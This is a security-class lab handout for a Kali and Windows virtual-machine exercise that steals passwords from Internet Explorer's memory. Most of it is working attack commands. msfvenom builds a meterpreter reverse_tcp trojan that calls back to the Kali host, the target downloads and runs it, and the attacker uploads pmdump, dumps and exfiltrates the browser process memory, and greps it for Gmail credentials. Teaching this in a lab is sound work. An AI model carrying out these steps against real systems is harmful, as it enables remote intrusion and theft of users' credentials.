Project 15: Stealing Passwords from RAM with Metasploit (10 pts.)

What You Need

A Windows 2008 Server virtual machine (any otner Windows version should be fine too, but it must not have antivirus software running)
A Kali 2 virtual machine

Purpose

Using meterpreter commands, we'll dump the memory of Internet Explorer to a file, download it, and steal passwords from it.

There have been various Metasploit scripts to automate this process, but they don't work for long before Metasploit changes make them stop working, so I recommend using this manual process.

Starting Apache on your Kali Machine

In your Kali 2 machine, in a Terminal window, execute these commands:

ifconfig
service apache2 restart

Testing Networking

On your Windows machine, open a Web browser and enter the IP address of your Kali machine.

You should see the Apache2 default page, as shown below. If you can't connect, you need to debug your networking before proceeding.

I recommend placing both machines into NAT networking mode for this project.

Logging in to Gmail

On your Windows machine, in Internet Explorer, open gmail.com and attempt to log in with these credentials, replacing "YOURNAME" with your own name:

YOURNAME@gmail.com
SECRET_PASSWORD_YOURNAME

Click the "Sign in" button. Gmail won't let you in, but that doesn't matter for our purposes. The important thing for this project is that Internet Explorer placed your credentials into RAM.

Creating a Trojan

In your Kali 2 machine, in a Terminal window, execute these commands, replacing the IP address with the IP address of your Kali machine.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.119.130 -f exe > fun.exe
cp fun.exe /var/www/html

Downloading pmdump

We'll use a really old tool--pmdump, from 2002. It still works!

In your Kali 2 machine, in a Terminal window, execute these commands:

curl https://samsclass.info/124/proj14/pmdump.exe > pmdump.exe file pmdump.exe
cp pmdump.exe /tmp

Starting a Meterpreter Handler

In your Kali 2 machine, in a Terminal window, execute these commands, replacing the IP address with the IP address of your Kali machine.

msfconsole use multi/handler set PAYLOAD windows/meterpreter/reverse_tcp show options set LHOST 192.168.119.130
exploit

The payload handler waits, listening, as shown below.

Downloading and Executing the Malicious Executable

On your Windows target machine, in a Web browser, enter this URL, replacing the IP address with the IP address of your Kali machine.

http://192.168.119.130/fun.exe

Run the file, as shown below.

Uploading pmdump to the Target

On your Kali machine, a Meterpreter session should be open, as shown below.

At the meterpreter prompt, execute these commands:

cd %TEMP% pwd
upload /tmp/pmdump.exe %TEMP%

At the meterpreter prompt, execute these commands:

shell
dir

You should see the pmdump.exe file, as shown below.

Execute these commands to see how pmdump works, and list the processes on the target system.

pmdump.exe
pmdump.exe -list

Find "iexplore.exe" in the list, and notice its Process ID number, as shown below.

Execute these commands, replacing "1728" with the correct process ID of "iexplore.exe":

pmdump.exe 1728 ie.mem
dir

As shown below, the RAM used by Internet Explorer is now in a file named ie.mem. This file is approximately 95 MB in size.

Execute these commands to return to the Meterpreter shell and start downloading the "ie.mem" file:

exit
download ie.mem /tmp

The download starts, but doesn't finish right away, as shown below.

To see the progress of the download, open a new Terminal window and execute these commands:

cd /tmp
watch "ls -l ie.mem"

You can see the file increasing in size, as shown below.

When it's done, you'll see a "download" message and a new "meterpreter" prompt in the window showing the Meterpreter session:

In the Terminal window showing the "watch" results, press

Ctrl+C to stop "watch".

Execute this command to search for login credentials in the RAM file:

strings ie.mem | grep "@gmail.com"

Your username and password should be easy to find. Highlight them, as shown below:

Saving the Screen Image

Make sure your username and password are visible and highlighted, as shown above.

Save a whole-desktop screen capture with a filename of "Proj 15 from YOUR NAME".

Turning In Your Project

Email the image to cnit.124@gmail.com with a subject of "Project 15 from YOUR NAME".

Posted 11-4-15 by Sam Bowne
Updated 11-16-17